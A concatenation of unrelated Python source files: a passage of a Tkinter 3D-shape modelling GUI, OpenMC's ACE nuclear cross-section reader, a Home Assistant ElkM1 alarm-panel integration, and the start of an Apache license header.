self.pLabels[3].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 4):
self.pLabels[i].grid(row=i + 1, column=0)
self.pEntries[i + 2].grid(row=i + 1, column=1, columnspan=2)
maxRow = 4
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="length")
self.pLabels[3].config(text="width")
self.pLabels[4].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 5):
self.pLabels[i].grid(row=i + 1, column=0)
self.pEntries[i + 2].grid(row=i + 1, column=1, columnspan=2)
maxRow = 5
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="upperLength")
self.pLabels[3].config(text="upperWidth")
self.pLabels[4].config(text="lowerLength")
self.pLabels[5].config(text="lowerWidth")
self.pLabels[6].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 7):
self.pLabels[i].grid(row=i + 3, column=0)
self.pEntries[i + 2].grid(row=i + 3, column=1, columnspan=2)
maxRow = 7
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
self.pLabels[2].grid(row=3, column=0)
self.pEntries[4 + 2].grid(row=3, column=1, columnspan=2)
maxRow = 3
self.faceListLabel.grid(row=maxRow + 2, column=0, columnspan=3)
self.facesList.grid(row=maxRow + 3, column=0, columnspan=3)
self.addFaceButton.grid(row=maxRow + 5, column=0, columnspan=3)
self.deleteFaceButton.grid(row=maxRow + 6, column=0, columnspan=3)
if self.updateRightFrame2Flag == True:
self.fecthRightFrame2Data()
else:
self.rightFrame2.grid_forget()
self.doneButton2.grid_forget()
self.cancelButton2.grid_forget()
for i in range(7):
self.pLabels[i].grid_forget()
self.pEntries[i].grid_forget()
self.faceListLabel.grid_forget()
self.facesList.grid_forget()
self.addFaceButton.grid_forget()
self.deleteFaceButton.grid_forget()
def showRightFrame3(self, flag):
if flag == 1:
self.rightFrame3.grid(column=1, row=0, rowspan=2, sticky=N)
self.rightFrame3.grid_propagate(0)
self.faceDirLabel.grid(row=0, column=0, sticky=S + N + W + E)
self.faceOptionMenu.grid(row=1, column=0, sticky=S + N + W + E)
else:
self.rightFrame3.grid_forget()
self.faceDirLabel.grid_forget()
self.faceOptionMenu.grid_forget()
#pragma mark -- button actions
#buttons in scene 1
def generateVideoButton(self):
# for i in range(len(self.shapes)):
# print " "
# print self.shapes[i].name
# for j in range(len(self.shapes[i].faces)):
# print self.shapes[i].faces[j].faceOrientation, " : ", self.shapes[i].faces[j].facePoints
mb = ModelBuilder()
Models = []
for i in self.shapes:
each_model = mb.BuildModel(i)
# Print out the 3D model's vertex and texel coordinate
# print "Print out the 3D model's vertex and texel coordinate---------------------------"
# for j in each_model:
# # j is one polygon
# print "Vertex is:"
# for k in j.Vertex:
# print k.x, k.y, k.z
# print "Texel is:"
# for n in j.Texel:
# print n.u, n.v
Models.append(each_model)
print "Models list size: ", len(Models)
img = cv2.imread("project.png",cv2.CV_LOAD_IMAGE_COLOR)
texture = Texture(img)
points = []
for i in range(0,len(Models),1):
pointsOfEachModel = []
if (i<5): # for single model building 4,11,12,13 and ground
fileIndex = i
for j in range(len(Models[i])): # j is surfaces of each model
pointsOfEachFace = texture.putTexture(Models[i][j])
pointsOfEachModel.extend(pointsOfEachFace)
elif i==5: #5-6 compound building 10
fileIndex = 5
for j in range(5, 7):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
elif i==7: #7-12 compound building 9
fileIndex = 6
for j in range(7, 13):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
elif (i-13)>=0 and (i-13)%2==0: #compound buildings 1-8
multiple = (i-13)/2
fileIndex = 7 + multiple
for j in range(i, i+2):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
else:
continue
points = pointsOfEachModel
fileRGB = open("Models/model_"+str(fileIndex)+".dat", "w+")
for k in range(len(pointsOfEachModel)):
point = "{0},{1},{2},{r},{g},{b}\n".format(points[k].x, points[k].y,points[k].z,r=points[k].r, g=points[k].g, b=points[k].b)
fileRGB.write(point)
print "Model "+str(fileIndex)+":"+str(k)+" points generated"
print "----------UI Phase Finished----------"
print "All models have been generated, please use main.py to generate fraems of video"
def newShapeButton(self):
self.newShapeFlag = True
self.updateRightFrame2Flag = True;
self.currentIndex = len(self.shapes)
if self.shape.get() == "cylinder":
self.shapes.append(sp.Cylinder([0, 0, 0], 0, 0, ""))
elif self.shape.get() == "cuboid":
self.shapes.append(sp.Cuboid([0, 0, 0], 0, 0, 0, ""))
elif self.shape.get() == "prism":
self.shapes.append(sp.Prism([0, 0, 0], 0, 0, 0, ""))
elif self.shape.get() == "frustum":
self.shapes.append(sp.Frustum([0, 0, 0], 0, 0, 0, 0, 0, ""))
elif self.shape.get() == "tree":
self.shapes.append(sp.Tree([0, 0, 0], 0, ""))
elif self.shape.get() == "sky":
self.shapes.append(sp.Sky(""))
elif self.shape.get() == "ground":
self.shapes.append(sp.Ground(""))
self.show(2)
self.state = 2
def editButton1(self):
self.newShapeFlag = False
self.updateRightFrame2Flag = True
self.currentIndex = (self.shapesList.curselection())[0]
self.currentIndex = int(self.currentIndex)
self.show(2)
self.state = 2
def deleteButton(self):
index = int ((self.shapesList.curselection())[0])
del self.shapes[index]
self.shapesList.delete(index)
#buttons in scene 2
def addFaceButton(self):
self.updateRightFrame2Flag = False
self.show(3)
self.state = 3
def cancelButton2(self):
if self.newShapeFlag == True:
del self.shapes[self.currentIndex]
self.show(1)
self.state = 1
def doneButton2(self):
#save changes only when name is not empty
if self.pEntries[0].get() != "":
self.shapes[self.currentIndex].name = self.pEntries[0].get()
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].radius = int (self.pEntries[4].get())
self.shapes[self.currentIndex].height = int (self.pEntries[5].get())
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].length = int (self.pEntries[4].get())
self.shapes[self.currentIndex].width = int (self.pEntries[5].get())
self.shapes[self.currentIndex].height = int (self.pEntries[6].get())
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].upperLength = int (self.pEntries[4].get())
self.shapes[self.currentIndex].upperWidth = int (self.pEntries[5].get())
self.shapes[self.currentIndex].lowerLength = int (self.pEntries[6].get())
self.shapes[self.currentIndex].lowerWidth = int (self.pEntries[7].get())
self.shapes[self.currentIndex].height = int (self.pEntries[8].get())
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].height = int (self.pEntries[4].get())
if self.newShapeFlag == True:
self.shapesList.insert(END, self.shapes[self.currentIndex].name)
else:
self.shapesList.delete(self.currentIndex)
self.shapesList.insert(self.currentIndex, self.shapes[self.currentIndex].name)
self.show(1)
self.state = 1
def deleteFaceButton(self):
index = int((self.facesList.curselection())[0])
if (index < len(self.shapes[self.currentIndex].faces)):
for i in range(len(self.shapes[self.currentIndex].faces[index].lineIds)):
self.canvas.delete(self.shapes[self.currentIndex].faces[index].lineIds[i])
del self.shapes[self.currentIndex].faces[index]
self.facesList.delete(index)
#buttons in scene 3
def cancelButton3(self):
if isinstance(self.shapes[self.currentIndex], sp.Tree):
print "cancel tree face"
else:
self.canvas.delete(self.pointId)
for i in range(len(self.lineIds)):
self.canvas.delete(self.lineIds[i])
self.clear()
self.show(2)
self.state = 2
def doneButton3(self):
if isinstance(self.shapes[self.currentIndex], sp.Tree):
print "treeFace"
else:
pLen = len(self.points)
lineId = self.canvas.create_line(self.points[pLen - 1][0], self.points[pLen - 1][1], self.points[0][0],
self.points[0][1], fill="red")
self.lineIds.append(lineId)
face = sp.Face(self.points, self.faceDir.get())
face.lineIds = self.lineIds
self.shapes[self.currentIndex].faces.append(face)
self.clear()
self.show(2)
self.state = 2
#pragma mark -- canvas draw
def drawPoint(self, p):
return self.canvas.create_oval(p[0], p[1], p[0], p[1], fill="red", outline="red")
def canvasClicked(self, event):
if self.state == 3:
x = self.canvas.canvasx(event.x)
y = self.canvas.canvasy(event.y)
lineId = ""
self.points.append([x, y])
pLen = len(self.points)
if (pLen == 1):
self.pointId = self.drawPoint([x, y])
elif (pLen == 2):
self.canvas.delete(self.pointId)
lineId = self.canvas.create_line(self.points[pLen - 2][0], self.points[pLen - 2][1], x, y, fill="red")
self.lineIds.append(lineId)
else:
lineId = self.canvas.create_line(self.points[pLen - 2][0], self.points[pLen - 2][1], x, y, fill="red")
self.lineIds.append(lineId)
root = Tk()
root.resizable(width=FALSE, height=FALSE)
app = App(root)
root.mainloop()
| |
"""This module is for reading ACE-format cross sections. ACE stands for "A
Compact ENDF" format and originated from work on MCNP_. It is used in a number
of other Monte Carlo particle transport codes.
ACE-format cross sections are typically generated from ENDF_ files through a
cross section processing program like NJOY_. The ENDF data consists of tabulated
thermal data, ENDF/B resonance parameters, distribution parameters in the
unresolved resonance region, and tabulated data in the fast region. After the
ENDF data has been reconstructed and Doppler-broadened, the ACER module
generates ACE-format cross sections.
.. _MCNP: https://laws.lanl.gov/vhosts/mcnp.lanl.gov/
.. _NJOY: http://t2.lanl.gov/codes.shtml
.. _ENDF: http://www.nndc.bnl.gov/endf
"""
from pathlib import PurePath
import struct
import sys
import numpy as np
from openmc.mixin import EqualityMixin
import openmc.checkvalue as cv
from .data import ATOMIC_SYMBOL, gnd_name
from .endf import ENDF_FLOAT_RE
def get_metadata(zaid, metastable_scheme='nndc'):
"""Return basic identifying data for a nuclide with a given ZAID.
Parameters
----------
zaid : int
ZAID (1000*Z + A) obtained from a library
metastable_scheme : {'nndc', 'mcnp'}
Determine how ZAID identifiers are to be interpreted in the case of
a metastable nuclide. Because the normal ZAID (=1000*Z + A) does not
encode metastable information, different conventions are used among
different libraries. In MCNP libraries, the convention is to add 400
for a metastable nuclide except for Am242m, for which 95242 is
metastable and 95642 (or 1095242 in newer libraries) is the ground
state. For NNDC libraries, ZAID is given as 1000*Z + A + 100*m.
Returns
-------
name : str
Name of the table
element : str
The atomic symbol of the isotope in the table; e.g., Zr.
Z : int
Number of protons in the nucleus
mass_number : int
Number of nucleons in the nucleus
metastable : int
Metastable state of the nucleus. A value of zero indicates ground state.
"""
cv.check_type('zaid', zaid, int)
cv.check_value('metastable_scheme', metastable_scheme, ['nndc', 'mcnp'])
Z = zaid // 1000
mass_number = zaid % 1000
if metastable_scheme == 'mcnp':
if zaid > 1000000:
# New SZA format
Z = Z % 1000
if zaid == 1095242:
metastable = 0
else:
metastable = zaid // 1000000
else:
if zaid == 95242:
metastable = 1
elif zaid == 95642:
metastable = 0
else:
metastable = 1 if mass_number > 300 else 0
elif metastable_scheme == 'nndc':
metastable = 1 if mass_number > 300 else 0
while mass_number > 3 * Z:
mass_number -= 100
# Determine name
element = ATOMIC_SYMBOL[Z]
name = gnd_name(Z, mass_number, metastable)
return (name, element, Z, mass_number, metastable)
def ascii_to_binary(ascii_file, binary_file):
"""Convert an ACE file in ASCII format (type 1) to binary format (type 2).
Parameters
----------
ascii_file : str
Filename of ASCII ACE file
binary_file : str
Filename of binary ACE file to be written
"""
# Open ASCII file
ascii = open(str(ascii_file), 'r')
# Set default record length
record_length = 4096
# Read data from ASCII file
lines = ascii.readlines()
ascii.close()
# Open binary file
binary = open(str(binary_file), 'wb')
idx = 0
while idx < len(lines):
# check if it's a > 2.0.0 version header
if lines[idx].split()[0][1] == '.':
if lines[idx + 1].split()[3] == '3':
idx = idx + 3
else:
raise NotImplementedError('Only backwards compatible ACE'
'headers currently supported')
# Read/write header block
hz = lines[idx][:10].encode('UTF-8')
aw0 = float(lines[idx][10:22])
tz = float(lines[idx][22:34])
hd = lines[idx][35:45].encode('UTF-8')
hk = lines[idx + 1][:70].encode('UTF-8')
hm = lines[idx + 1][70:80].encode('UTF-8')
binary.write(struct.pack(str('=10sdd10s70s10s'), hz, aw0, tz, hd, hk, hm))
# Read/write IZ/AW pairs
data = ' '.join(lines[idx + 2:idx + 6]).split()
iz = list(map(int, data[::2]))
aw = list(map(float, data[1::2]))
izaw = [item for sublist in zip(iz, aw) for item in sublist]
binary.write(struct.pack(str('=' + 16*'id'), *izaw))
# Read/write NXS and JXS arrays. Null bytes are added at the end so
# that XSS will start at the second record
nxs = list(map(int, ' '.join(lines[idx + 6:idx + 8]).split()))
jxs = list(map(int, ' '.join(lines[idx + 8:idx + 12]).split()))
binary.write(struct.pack(str('=16i32i{0}x'.format(record_length - 500)),
*(nxs + jxs)))
# Read/write XSS array. Null bytes are added to form a complete record
# at the end of the file
n_lines = (nxs[0] + 3)//4
xss = list(map(float, ' '.join(lines[
idx + 12:idx + 12 + n_lines]).split()))
extra_bytes = record_length - ((len(xss)*8 - 1) % record_length + 1)
binary.write(struct.pack(str('={0}d{1}x'.format(nxs[0], extra_bytes)),
*xss))
# Advance to next table in file
idx += 12 + n_lines
# Close binary file
binary.close()
def get_table(filename, name=None):
"""Read a single table from an ACE file
Parameters
----------
filename : str
Path of the ACE library to load table from
name : str, optional
Name of table to load, e.g. '92235.71c'
Returns
-------
openmc.data.ace.Table
ACE table with specified name. If no name is specified, the first table
in the file is returned.
"""
if name is None:
return Library(filename).tables[0]
else:
lib = Library(filename, name)
if lib.tables:
return lib.tables[0]
else:
raise ValueError('Could not find ACE table with name: {}'
.format(name))
class Library(EqualityMixin):
"""A Library objects represents an ACE-formatted file which may contain
multiple tables with data.
Parameters
----------
filename : str
Path of the ACE library file to load.
table_names : None, str, or iterable, optional
Tables from the file to read in. If None, reads in all of the
tables. If str, reads in only the single table of a matching name.
verbose : bool, optional
Determines whether output is printed to the stdout when reading a
Library
Attributes
----------
tables : list
List of :class:`Table` instances
"""
def __init__(self, filename, table_names=None, verbose=False):
if isinstance(table_names, str):
table_names = [table_names]
if table_names is not None:
table_names = set(table_names)
self.tables = []
# Determine whether file is ASCII or binary
filename = str(filename)
try:
fh = open(filename, 'rb')
# Grab 10 lines of the library
sb = b''.join([fh.readline() for i in range(10)])
# Try to decode it with ascii
sb.decode('ascii')
# No exception so proceed with ASCII - reopen in non-binary
fh.close()
with open(filename, 'r') as fh:
self._read_ascii(fh, table_names, verbose)
except UnicodeDecodeError:
fh.close()
with open(filename, 'rb') as fh:
self._read_binary(fh, table_names, verbose)
def _read_binary(self, ace_file, table_names, verbose=False,
recl_length=4096, entries=512):
"""Read a binary (Type 2) ACE table.
Parameters
----------
ace_file : file
Open ACE file
table_names : None, str, or iterable
Tables from the file to read in. If None, reads in all of the
tables. If str, reads in only the single table of a matching name.
verbose : str, optional
Whether to display what tables are being read. Defaults to False.
recl_length : int, optional
Fortran record length in binary file. Default value is 4096 bytes.
entries : int, optional
Number of entries per record. The default is 512 corresponding to a
record length of 4096 bytes with double precision data.
"""
while True:
start_position = ace_file.tell()
# Check for end-of-file
if len(ace_file.read(1)) == 0:
return
ace_file.seek(start_position)
# Read name, atomic mass ratio, temperature, date, comment, and
# material
name, atomic_weight_ratio, temperature, date, comment, mat = \
struct.unpack(str('=10sdd10s70s10s'), ace_file.read(116))
name = name.decode().strip()
# Read ZAID/awr combinations
data = struct.unpack(str('=' + 16*'id'), ace_file.read(192))
pairs = list(zip(data[::2], data[1::2]))
# Read NXS
nxs = list(struct.unpack(str('=16i'), ace_file.read(64)))
# Determine length of XSS and number of records
length = nxs[0]
n_records = (length + entries - 1)//entries
# verify that we are supposed to read this table in
if (table_names is not None) and (name not in table_names):
ace_file.seek(start_position + recl_length*(n_records + 1))
continue
if verbose:
kelvin = round(temperature * 1e6 / 8.617342e-5)
print("Loading nuclide {0} at {1} K".format(name, kelvin))
# Read JXS
jxs = list(struct.unpack(str('=32i'), ace_file.read(128)))
# Read XSS
ace_file.seek(start_position + recl_length)
xss = list(struct.unpack(str('={0}d'.format(length)),
ace_file.read(length*8)))
# Insert zeros at beginning of NXS, JXS, and XSS arrays so that the
# indexing will be the same as Fortran. This makes it easier to
# follow the ACE format specification.
nxs.insert(0, 0)
nxs = np.array(nxs, dtype=int)
jxs.insert(0, 0)
jxs = np.array(jxs, dtype=int)
xss.insert(0, 0.0)
xss = np.array(xss)
# Create ACE table with data read in
table = Table(name, atomic_weight_ratio, temperature, pairs,
nxs, jxs, xss)
self.tables.append(table)
# Advance to next record
ace_file.seek(start_position + recl_length*(n_records + 1))
def _read_ascii(self, ace_file, table_names, verbose=False):
"""Read an ASCII (Type 1) ACE table.
Parameters
----------
ace_file : file
Open ACE file
table_names : None, str, or iterable
Tables from the file to read in. If None, reads in all of the
tables. If str, reads in only the single table of a matching name.
verbose : str, optional
Whether to display what tables are being read. Defaults to False.
"""
tables_seen = set()
lines = [ace_file.readline() for i in range(13)]
while len(lines) != 0 and lines[0].strip() != '':
# Read name of table, atomic mass ratio, and temperature. If first
# line is empty, we are at end of file
# check if it's a 2.0 style header
if lines[0].split()[0][1] == '.':
words = lines[0].split()
name = words[1]
words = lines[1].split()
atomic_weight_ratio = float(words[0])
temperature = float(words[1])
commentlines = int(words[3])
for i in range(commentlines):
lines.pop(0)
lines.append(ace_file.readline())
else:
words = lines[0].split()
name = words[0]
atomic_weight_ratio = float(words[1])
temperature = float(words[2])
datastr = ' '.join(lines[2:6]).split()
pairs = list(zip(map(int, datastr[::2]),
map(float, datastr[1::2])))
datastr = '0 ' + ' '.join(lines[6:8])
nxs = np.fromstring(datastr, sep=' ', dtype=int)
n_lines = (nxs[1] + 3)//4
# Ensure that we have more tables to read in
if (table_names is not None) and (table_names <= tables_seen):
break
tables_seen.add(name)
# verify that we are supposed to read this table in
if (table_names is not None) and (name not in table_names):
for i in range(n_lines - 1):
ace_file.readline()
lines = [ace_file.readline() for i in range(13)]
continue
# Read lines corresponding to this table
lines += [ace_file.readline() for i in range(n_lines - 1)]
if verbose:
kelvin = round(temperature * 1e6 / 8.617342e-5)
print("Loading nuclide {0} at {1} K".format(name, kelvin))
# Insert zeros at beginning of NXS, JXS, and XSS arrays so that the
# indexing will be the same as Fortran. This makes it easier to
# follow the ACE format specification.
datastr = '0 ' + ' '.join(lines[8:12])
jxs = np.fromstring(datastr, dtype=int, sep=' ')
datastr = '0.0 ' + ''.join(lines[12:12+n_lines])
xss = np.fromstring(datastr, sep=' ')
# When NJOY writes an ACE file, any values less than 1e-100 actually
# get written without the 'e'. Thus, what we do here is check
# whether the xss array is of the right size (if a number like
# 1.0-120 is encountered, np.fromstring won't capture any numbers
# after it). If it's too short, then we apply the ENDF float regular
# expression. We don't do this by default because it's expensive!
if xss.size != nxs[1] + 1:
datastr = ENDF_FLOAT_RE.sub(r'\1e\2', datastr)
xss = np.fromstring(datastr, sep=' ')
assert xss.size == nxs[1] + 1
table = Table(name, atomic_weight_ratio, temperature, pairs,
nxs, jxs, xss)
self.tables.append(table)
# Read all data blocks
lines = [ace_file.readline() for i in range(13)]
class Table(EqualityMixin):
"""ACE cross section table
Parameters
----------
name : str
ZAID identifier of the table, e.g. '92235.70c'.
atomic_weight_ratio : float
Atomic mass ratio of the target nuclide.
temperature : float
Temperature of the target nuclide in MeV.
pairs : list of tuple
16 pairs of ZAIDs and atomic weight ratios. Used for thermal scattering
tables to indicate what isotopes scattering is applied to.
nxs : numpy.ndarray
Array that defines various lengths with in the table
jxs : numpy.ndarray
Array that gives locations in the ``xss`` array for various blocks of
data
xss : numpy.ndarray
Raw data for the ACE table
"""
def __init__(self, name, atomic_weight_ratio, temperature, pairs,
nxs, jxs, xss):
self.name = name
self.atomic_weight_ratio = atomic_weight_ratio
self.temperature = temperature
self.pairs = pairs
self.nxs = nxs
self.jxs = jxs
self.xss = xss
def __repr__(self):
return "<ACE Table: {}>".format(self.name)
| |
"""Each ElkM1 area will be created as a separate alarm_control_panel."""
from elkm1_lib.const import AlarmState, ArmedStatus, ArmLevel, ArmUpState
from elkm1_lib.util import username
import voluptuous as vol
from homeassistant.components.alarm_control_panel import (
ATTR_CHANGED_BY,
FORMAT_NUMBER,
AlarmControlPanelEntity,
)
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
SUPPORT_ALARM_ARM_NIGHT,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_ARMING,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
)
from homeassistant.helpers import entity_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from . import ElkAttachedEntity, create_elk_entities
from .const import (
ATTR_CHANGED_BY_ID,
ATTR_CHANGED_BY_KEYPAD,
ATTR_CHANGED_BY_TIME,
DOMAIN,
ELK_USER_CODE_SERVICE_SCHEMA,
)
DISPLAY_MESSAGE_SERVICE_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_ENTITY_ID, default=[]): cv.entity_ids,
vol.Optional("clear", default=2): vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
vol.Optional("beep", default=False): cv.boolean,
vol.Optional("timeout", default=0): vol.All(
vol.Coerce(int), vol.Range(min=0, max=65535)
),
vol.Optional("line1", default=""): cv.string,
vol.Optional("line2", default=""): cv.string,
}
)
SERVICE_ALARM_DISPLAY_MESSAGE = "alarm_display_message"
SERVICE_ALARM_ARM_VACATION = "alarm_arm_vacation"
SERVICE_ALARM_ARM_HOME_INSTANT = "alarm_arm_home_instant"
SERVICE_ALARM_ARM_NIGHT_INSTANT = "alarm_arm_night_instant"
SERVICE_ALARM_BYPASS = "alarm_bypass"
SERVICE_ALARM_CLEAR_BYPASS = "alarm_clear_bypass"
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the ElkM1 alarm platform."""
elk_data = hass.data[DOMAIN][config_entry.entry_id]
elk = elk_data["elk"]
entities = []
create_elk_entities(elk_data, elk.areas, "area", ElkArea, entities)
async_add_entities(entities, True)
platform = entity_platform.current_platform.get()
platform.async_register_entity_service(
SERVICE_ALARM_ARM_VACATION,
ELK_USER_CODE_SERVICE_SCHEMA,
"async_alarm_arm_vacation",
)
platform.async_register_entity_service(
SERVICE_ALARM_ARM_HOME_INSTANT,
ELK_USER_CODE_SERVICE_SCHEMA,
"async_alarm_arm_home_instant",
)
platform.async_register_entity_service(
SERVICE_ALARM_ARM_NIGHT_INSTANT,
ELK_USER_CODE_SERVICE_SCHEMA,
"async_alarm_arm_night_instant",
)
platform.async_register_entity_service(
SERVICE_ALARM_DISPLAY_MESSAGE,
DISPLAY_MESSAGE_SERVICE_SCHEMA,
"async_display_message",
)
platform.async_register_entity_service(
SERVICE_ALARM_BYPASS,
ELK_USER_CODE_SERVICE_SCHEMA,
"async_bypass",
)
platform.async_register_entity_service(
SERVICE_ALARM_CLEAR_BYPASS,
ELK_USER_CODE_SERVICE_SCHEMA,
"async_clear_bypass",
)
class ElkArea(ElkAttachedEntity, AlarmControlPanelEntity, RestoreEntity):
"""Representation of an Area / Partition within the ElkM1 alarm panel."""
def __init__(self, element, elk, elk_data):
"""Initialize Area as Alarm Control Panel."""
super().__init__(element, elk, elk_data)
self._elk = elk
self._changed_by_keypad = None
self._changed_by_time = None
self._changed_by_id = None
self._changed_by = None
self._state = None
async def async_added_to_hass(self):
"""Register callback for ElkM1 changes."""
await super().async_added_to_hass()
if len(self._elk.areas.elements) == 1:
for keypad in self._elk.keypads:
keypad.add_callback(self._watch_keypad)
self._element.add_callback(self._watch_area)
# We do not get changed_by back from resync.
last_state = await self.async_get_last_state()
if not last_state:
return
if ATTR_CHANGED_BY_KEYPAD in last_state.attributes:
self._changed_by_keypad = last_state.attributes[ATTR_CHANGED_BY_KEYPAD]
if ATTR_CHANGED_BY_TIME in last_state.attributes:
self._changed_by_time = last_state.attributes[ATTR_CHANGED_BY_TIME]
if ATTR_CHANGED_BY_ID in last_state.attributes:
self._changed_by_id = last_state.attributes[ATTR_CHANGED_BY_ID]
if ATTR_CHANGED_BY in last_state.attributes:
self._changed_by = last_state.attributes[ATTR_CHANGED_BY]
def _watch_keypad(self, keypad, changeset):
if keypad.area != self._element.index:
return
if changeset.get("last_user") is not None:
self._changed_by_keypad = keypad.name
self._changed_by_time = keypad.last_user_time.isoformat()
self._changed_by_id = keypad.last_user + 1
self._changed_by = username(self._elk, keypad.last_user)
self.async_write_ha_state()
def _watch_area(self, area, changeset):
last_log = changeset.get("last_log")
if not last_log:
return
# user_number only set for arm/disarm logs
if not last_log.get("user_number"):
return
self._changed_by_keypad = None
self._changed_by_id = last_log["user_number"]
self._changed_by = username(self._elk, self._changed_by_id - 1)
self._changed_by_time = last_log["timestamp"]
self.async_write_ha_state()
@property
def code_format(self):
"""Return the alarm code format."""
return FORMAT_NUMBER
@property
def state(self):
"""Return the state of the element."""
return self._state
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY | SUPPORT_ALARM_ARM_NIGHT
@property
def device_state_attributes(self):
"""Attributes of the area."""
attrs = self.initial_attrs()
elmt = self._element
attrs["is_exit"] = elmt.is_exit
attrs["timer1"] = elmt.timer1
attrs["timer2"] = elmt.timer2
if elmt.armed_status is not None:
attrs["armed_status"] = ArmedStatus(elmt.armed_status).name.lower()
if elmt.arm_up_state is not None:
attrs["arm_up_state"] = ArmUpState(elmt.arm_up_state).name.lower()
if elmt.alarm_state is not None:
attrs["alarm_state"] = AlarmState(elmt.alarm_state).name.lower()
attrs[ATTR_CHANGED_BY_KEYPAD] = self._changed_by_keypad
attrs[ATTR_CHANGED_BY_TIME] = self._changed_by_time
attrs[ATTR_CHANGED_BY_ID] = self._changed_by_id
return attrs
@property
def changed_by(self):
"""Last change triggered by."""
return self._changed_by
def _element_changed(self, element, changeset):
elk_state_to_hass_state = {
ArmedStatus.DISARMED.value: STATE_ALARM_DISARMED,
ArmedStatus.ARMED_AWAY.value: STATE_ALARM_ARMED_AWAY,
ArmedStatus.ARMED_STAY.value: STATE_ALARM_ARMED_HOME,
ArmedStatus.ARMED_STAY_INSTANT.value: STATE_ALARM_ARMED_HOME,
ArmedStatus.ARMED_TO_NIGHT.value: STATE_ALARM_ARMED_NIGHT,
ArmedStatus.ARMED_TO_NIGHT_INSTANT.value: STATE_ALARM_ARMED_NIGHT,
ArmedStatus.ARMED_TO_VACATION.value: STATE_ALARM_ARMED_AWAY,
}
if self._element.alarm_state is None:
self._state = None
elif self._area_is_in_alarm_state():
self._state = STATE_ALARM_TRIGGERED
elif self._entry_exit_timer_is_running():
self._state = (
STATE_ALARM_ARMING if self._element.is_exit else STATE_ALARM_PENDING
)
else:
self._state = elk_state_to_hass_state[self._element.armed_status]
def _entry_exit_timer_is_running(self):
return self._element.timer1 > 0 or self._element.timer2 > 0
def _area_is_in_alarm_state(self):
return self._element.alarm_state >= AlarmState.FIRE_ALARM.value
async def async_alarm_disarm(self, code=None):
"""Send disarm command."""
self._element.disarm(int(code))
async def async_alarm_arm_home(self, code=None):
"""Send arm home command."""
self._element.arm(ArmLevel.ARMED_STAY.value, int(code))
async def async_alarm_arm_away(self, code=None):
"""Send arm away command."""
self._element.arm(ArmLevel.ARMED_AWAY.value, int(code))
async def async_alarm_arm_night(self, code=None):
"""Send arm night command."""
self._element.arm(ArmLevel.ARMED_NIGHT.value, int(code))
async def async_alarm_arm_home_instant(self, code=None):
"""Send arm stay instant command."""
self._element.arm(ArmLevel.ARMED_STAY_INSTANT.value, int(code))
async def async_alarm_arm_night_instant(self, code=None):
"""Send arm night instant command."""
self._element.arm(ArmLevel.ARMED_NIGHT_INSTANT.value, int(code))
async def async_alarm_arm_vacation(self, code=None):
"""Send arm vacation command."""
self._element.arm(ArmLevel.ARMED_VACATION.value, int(code))
async def async_display_message(self, clear, beep, timeout, line1, line2):
"""Display a message on all keypads for the area."""
self._element.display_message(clear, beep, timeout, line1, line2)
async def async_bypass(self, code=None):
"""Bypass all zones in area."""
self._element.bypass(code)
async def async_clear_bypass(self, code=None):
"""Clear bypass for all zones in area."""
self._element.clear_bypass(code)
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
